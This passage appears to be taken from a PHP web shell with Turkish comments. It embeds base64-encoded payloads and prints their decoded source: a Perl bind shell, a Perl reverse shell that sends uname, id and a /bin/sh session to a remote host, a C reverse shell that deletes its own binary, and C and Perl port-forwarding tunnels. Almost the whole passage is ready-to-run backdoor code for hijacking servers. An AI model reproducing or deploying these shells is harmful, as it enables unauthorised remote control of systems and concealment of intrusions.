  3156. $protocol=getprotobyname('tcp');
  3157.  
  3158. socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
  3159.  
  3160. setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
  3161.  
  3162. bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
  3163.  
  3164. listen(S,3) || die "Cant listen port\n";
  3165.  
  3166. while(1)
  3167.  
  3168. {
  3169.  
  3170. accept(CONN,S);
  3171.  
  3172. if(!($pid=fork))
  3173.  
  3174. {
  3175.  
  3176. die "Cannot fork" if (!defined $pid);
  3177.  
  3178. open STDIN,"<&CONN";
  3179.  
  3180. open STDOUT,">&CONN";
  3181.  
  3182. open STDERR,">&CONN";
  3183.  
  3184. exec $SHELL || die print CONN "Cant execute $SHELL\n";
  3185.  
  3186. close CONN;
  3187.  
  3188. exit 0;
  3189.  
  3190. }
  3191.  
  3192. }
  3193.  
  3194.  
  3195.  
  3196. */
  3197.  
  3198.  
  3199.  
  3200. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  3201.  
  3202. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  3203.  
  3204. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  3205.  
  3206. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  3207.  
  3208. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  3209.  
  3210. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  3211.  
  3212. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  3213.  
  3214.  
  3215.  
  3216. /* ?ST SATIRIN KIRILMI? HAL? */
  3217.  
  3218. /*
  3219.  
  3220.  
  3221.  
  3222. #!/usr/bin/perl
  3223.  
  3224. use Socket;
  3225.  
  3226. $cmd= "lynx";
  3227.  
  3228. $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
  3229.  
  3230. $0=$cmd;
  3231.  
  3232. $target=$ARGV[0];
  3233.  
  3234. $port=$ARGV[1];
  3235.  
  3236. $iaddr=inet_aton($target) || die("Error: $!\n");
  3237.  
  3238. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  3239.  
  3240. $proto=getprotobyname('tcp');
  3241.  
  3242. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  3243.  
  3244. connect(SOCKET, $paddr) || die("Error: $!\n");
  3245.  
  3246. open(STDIN, ">&SOCKET");
  3247.  
  3248. open(STDOUT, ">&SOCKET");
  3249.  
  3250. open(STDERR, ">&SOCKET");
  3251.  
  3252. system($system);
  3253.  
  3254. close(STDIN);
  3255.  
  3256. close(STDOUT);
  3257.  
  3258. close(STDERR);
  3259.  
  3260.  
  3261.  
  3262. */
  3263.  
  3264.  
  3265.  
  3266. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  3267.  
  3268. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  3269.  
  3270. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  3271.  
  3272. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  3273.  
  3274. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  3275.  
  3276. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  3277.  
  3278. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  3279.  
  3280. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  3281.  
  3282.  
  3283.  
  3284.  
  3285.  
  3286. /* ?ST SATIRIN KIRILMI? HAL? */
  3287.  
  3288. /*
  3289.  
  3290.  
  3291.  
  3292. #include <stdio.h>
  3293.  
  3294. #include <sys/socket.h>
  3295.  
  3296. #include <netinet/in.h>
  3297.  
  3298. int main(int argc, char *argv[])
  3299.  
  3300. {
  3301.  
  3302.  int fd;
  3303.  
  3304.  struct sockaddr_in sin;
  3305.  
  3306.  char rms[21]="rm -f ";
  3307.  
  3308.  daemon(1,0);
  3309.  
  3310.  sin.sin_family = AF_INET;
  3311.  
  3312.  sin.sin_port = htons(atoi(argv[2]));
  3313.  
  3314.  sin.sin_addr.s_addr = inet_addr(argv[1]);
  3315.  
  3316.  bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
  3317.  
  3318.  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
  3319.  
  3320.  if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
  3321.  
  3322.    perror("[-] connect()");
  3323.  
  3324.    exit(0);
  3325.  
  3326.  }
  3327.  
  3328.  strcat(rms, argv[0]);
  3329.  
  3330.  system(rms);  
  3331.  
  3332.  dup2(fd, 0);
  3333.  
  3334.  dup2(fd, 1);
  3335.  
  3336.  dup2(fd, 2);
  3337.  
  3338.  execl("/bin/sh","sh -i", NULL);
  3339.  
  3340.  close(fd);
  3341.  
  3342. }
  3343.  
  3344.  
  3345.  
  3346. */
  3347.  
  3348.  
  3349.  
  3350.  
  3351.  
  3352. $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
  3353.  
  3354. x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
  3355.  
  3356. HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
  3357.  
  3358. aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
  3359.  
  3360. lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
  3361.  
  3362. xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
  3363.  
  3364. W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
  3365.  
  3366. LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
  3367.  
  3368. udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
  3369.  
  3370. 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
  3371.  
  3372. iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
  3373.  
  3374. KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
  3375.  
  3376. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
  3377.  
  3378. hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
  3379.  
  3380. iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
  3381.  
  3382. ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
  3383.  
  3384. vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
  3385.  
  3386. AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
  3387.  
  3388. QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
  3389.  
  3390. ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
  3391.  
  3392. gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
  3393.  
  3394. wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
  3395.  
  3396. 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
  3397.  
  3398. MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
  3399.  
  3400. gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
  3401.  
  3402. 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
  3403.  
  3404. HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
  3405.  
  3406. dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
  3407.  
  3408. KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
  3409.  
  3410. ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
  3411.  
  3412. E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
  3413.  
  3414. Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
  3415.  
  3416. NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
  3417.  
  3418. J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
  3419.  
  3420. CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
  3421.  
  3422. dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
  3423.  
  3424. gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
  3425.  
  3426. lsZSk7DQogIHJldHVybiAwOw0KfQ==";
  3427.  
  3428.  
  3429.  
  3430. /* ?ST SATIRIN KIRILMI? HAL? */
  3431.  
  3432. /*
  3433.  
  3434.  
  3435.  
  3436. #include <sys/types.h>
  3437.  
  3438. #include <sys/socket.h>
  3439.  
  3440. #include <sys/wait.h>
  3441.  
  3442. #include <netinet/in.h>
  3443.  
  3444. #include <stdio.h>
  3445.  
  3446. #include <stdlib.h>
  3447.  
  3448. #include <errno.h>
  3449.  
  3450. #include <unistd.h>
  3451.  
  3452. #include <netdb.h>
  3453.  
  3454. #include <linux/time.h>
  3455.  
  3456. #ifdef STRERROR
  3457.  
  3458. extern char *sys_errlist[];
  3459.  
  3460. extern int sys_nerr;
  3461.  
  3462. char *undef = "Undefined error";
  3463.  
  3464. char *strerror(error)  
  3465.  
  3466. int error;  
  3467.  
  3468. {
  3469.  
  3470. if (error > sys_nerr)
  3471.  
  3472. return undef;
  3473.  
  3474. return sys_errlist[error];
  3475.  
  3476. }
  3477.  
  3478. #endif
  3479.  
  3480.  
  3481.  
  3482. main(argc, argv)  
  3483.  
  3484.   int argc;  
  3485.  
  3486.   char **argv;  
  3487.  
  3488. {
  3489.  
  3490.   int lsock, csock, osock;
  3491.  
  3492.   FILE *cfile;
  3493.  
  3494.   char buf[4096];
  3495.  
  3496.   struct sockaddr_in laddr, caddr, oaddr;
  3497.  
  3498.   int caddrlen = sizeof(caddr);
  3499.  
  3500.   fd_set fdsr, fdse;
  3501.  
  3502.   struct hostent *h;
  3503.  
  3504.   struct servent *s;
  3505.  
  3506.   int nbyt;
  3507.  
  3508.   unsigned long a;
  3509.  
  3510.   unsigned short oport;
  3511.  
  3512.  
  3513.  
  3514.   if (argc != 4) {
  3515.  
  3516.     fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
  3517.  
  3518.     return 30;
  3519.  
  3520.   }
  3521.  
  3522.   a = inet_addr(argv[3]);
  3523.  
  3524.   if (!(h = gethostbyname(argv[3])) &&
  3525.  
  3526.       !(h = gethostbyaddr(&a, 4, AF_INET))) {
  3527.  
  3528.     perror(argv[3]);
  3529.  
  3530.     return 25;
  3531.  
  3532.   }
  3533.  
  3534.   oport = atol(argv[2]);
  3535.  
  3536.   laddr.sin_port = htons((unsigned short)(atol(argv[1])));
  3537.  
  3538.   if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  3539.  
  3540.     perror("socket");
  3541.  
  3542.     return 20;
  3543.  
  3544.   }
  3545.  
  3546.   laddr.sin_family = htons(AF_INET);
  3547.  
  3548.   laddr.sin_addr.s_addr = htonl(0);
  3549.  
  3550.   if (bind(lsock, &laddr, sizeof(laddr))) {
  3551.  
  3552.     perror("bind");
  3553.  
  3554.     return 20;
  3555.  
  3556.   }
  3557.  
  3558.   if (listen(lsock, 1)) {
  3559.  
  3560.     perror("listen");
  3561.  
  3562.     return 20;
  3563.  
  3564.   }
  3565.  
  3566.   if ((nbyt = fork()) == -1) {
  3567.  
  3568.     perror("fork");
  3569.  
  3570.     return 20;
  3571.  
  3572.   }
  3573.  
  3574.   if (nbyt > 0)
  3575.  
  3576.     return 0;
  3577.  
  3578.   setsid();
  3579.  
  3580.   while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
  3581.  
  3582.     cfile = fdopen(csock,"r+");
  3583.  
  3584.     if ((nbyt = fork()) == -1) {
  3585.  
  3586.       fprintf(cfile, "500 fork: %s\n", strerror(errno));
  3587.  
  3588.       shutdown(csock,2);
  3589.  
  3590.       fclose(cfile);
  3591.  
  3592.       continue;
  3593.  
  3594.     }
  3595.  
  3596.     if (nbyt == 0)
  3597.  
  3598.       goto gotsock;
  3599.  
  3600.     fclose(cfile);
  3601.  
  3602.     while (waitpid(-1, NULL, WNOHANG) > 0);
  3603.  
  3604.   }
  3605.  
  3606.   return 20;
  3607.  
  3608.  
  3609.  
  3610.  gotsock:
  3611.  
  3612.   if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  3613.  
  3614.     fprintf(cfile, "500 socket: %s\n", strerror(errno));
  3615.  
  3616.     goto quit1;
  3617.  
  3618.   }
  3619.  
  3620.   oaddr.sin_family = h->h_addrtype;
  3621.  
  3622.   oaddr.sin_port = htons(oport);
  3623.  
  3624.   memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
  3625.  
  3626.   if (connect(osock, &oaddr, sizeof(oaddr))) {
  3627.  
  3628.     fprintf(cfile, "500 connect: %s\n", strerror(errno));
  3629.  
  3630.     goto quit1;
  3631.  
  3632.   }
  3633.  
  3634.   while (1) {
  3635.  
  3636.     FD_ZERO(&fdsr);
  3637.  
  3638.     FD_ZERO(&fdse);
  3639.  
  3640.     FD_SET(csock,&fdsr);
  3641.  
  3642.     FD_SET(csock,&fdse);
  3643.  
  3644.     FD_SET(osock,&fdsr);
  3645.  
  3646.     FD_SET(osock,&fdse);
  3647.  
  3648.     if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
  3649.  
  3650.       fprintf(cfile, "500 select: %s\n", strerror(errno));
  3651.  
  3652.       goto quit2;
  3653.  
  3654.     }
  3655.  
  3656.     if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
  3657.  
  3658.       if ((nbyt = read(csock,buf,4096)) <= 0)
  3659.  
  3660.     goto quit2;
  3661.  
  3662.       if ((write(osock,buf,nbyt)) <= 0)
  3663.  
  3664.     goto quit2;
  3665.  
  3666.     } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
  3667.  
  3668.       if ((nbyt = read(osock,buf,4096)) <= 0)
  3669.  
  3670.     goto quit2;
  3671.  
  3672.       if ((write(csock,buf,nbyt)) <= 0)
  3673.  
  3674.     goto quit2;
  3675.  
  3676.     }
  3677.  
  3678.   }
  3679.  
  3680.  
  3681.  
  3682.  quit2:
  3683.  
  3684.   shutdown(osock,2);
  3685.  
  3686.   close(osock);
  3687.  
  3688.  quit1:
  3689.  
  3690.   fflush(cfile);
  3691.  
  3692.   shutdown(csock,2);
  3693.  
  3694.  quit0:
  3695.  
  3696.   fclose(cfile);
  3697.  
  3698.   return 0;
  3699.  
  3700. }
  3701.  
  3702.  
  3703.  
  3704. */
  3705.  
  3706.  
  3707.  
  3708. $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
  3709.  
  3710. CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
  3711.  
  3712. bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
  3713.  
  3714. gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
  3715.  
  3716. NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
  3717.  
  3718. iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
  3719.  
  3720. aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
  3721.  
  3722. SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
  3723.  
  3724. xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
  3725.  
  3726. WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
  3727.  
  3728. CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
  3729.  
  3730. yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
  3731.  
  3732. I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
  3733.  
  3734. m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
  3735.  
  3736. IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
  3737.  
  3738. lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
  3739.  
  3740. QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
  3741.  
  3742. CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
  3743.  
  3744. c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
  3745.  
  3746. NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
  3747.  
  3748. UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
  3749.  
  3750. DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
  3751.  
  3752. ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
  3753.  
  3754. 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
  3755.  
  3756.  
  3757.  
  3758. /* ?ST SATIRIN KIRILMI? HAL? */
  3759.  
  3760. /*
  3761.  
  3762.  
  3763.  
  3764. #!/usr/bin/perl
  3765.  
  3766. use IO::Socket;
  3767.  
  3768. use POSIX;
  3769.  
  3770. $localport = $ARGV[0];
  3771.  
  3772. $host      = $ARGV[1];
  3773.  
  3774. $port      = $ARGV[2];
  3775.  
  3776. $daemon=1;
  3777.  
  3778. $DIR = undef;
  3779.  
  3780. $| = 1;
  3781.  
  3782. if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
  3783.  
  3784. %o = ('port' => $localport,'toport' => $port,'tohost' => $host);
  3785.  
  3786. $ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
  3787.  
  3788. $SIG{'CHLD'} = 'IGNORE';
  3789.  
  3790. $num = 0;
  3791.  
  3792. while (1) {
  3793.  
  3794. $ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
  3795.  
  3796. ++$num;
  3797.  
  3798. $pid = fork();
  3799.  
  3800. if (!defined($pid)) { print STDERR "$!\n"; }
  3801.  
  3802. elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }
  3803.  
  3804. else { $ch->close(); }
  3805.  
  3806. }
  3807.  
  3808. sub Run {
  3809.  
  3810. my($o, $ch, $num) = @_;
  3811.  
  3812. my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
  3813.  
  3814. if (!$th) { exit 0; }
  3815.  
  3816. my $fh;
  3817.  
  3818. if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
  3819.  
  3820. $ch->autoflush();
  3821.  
  3822. $th->autoflush();
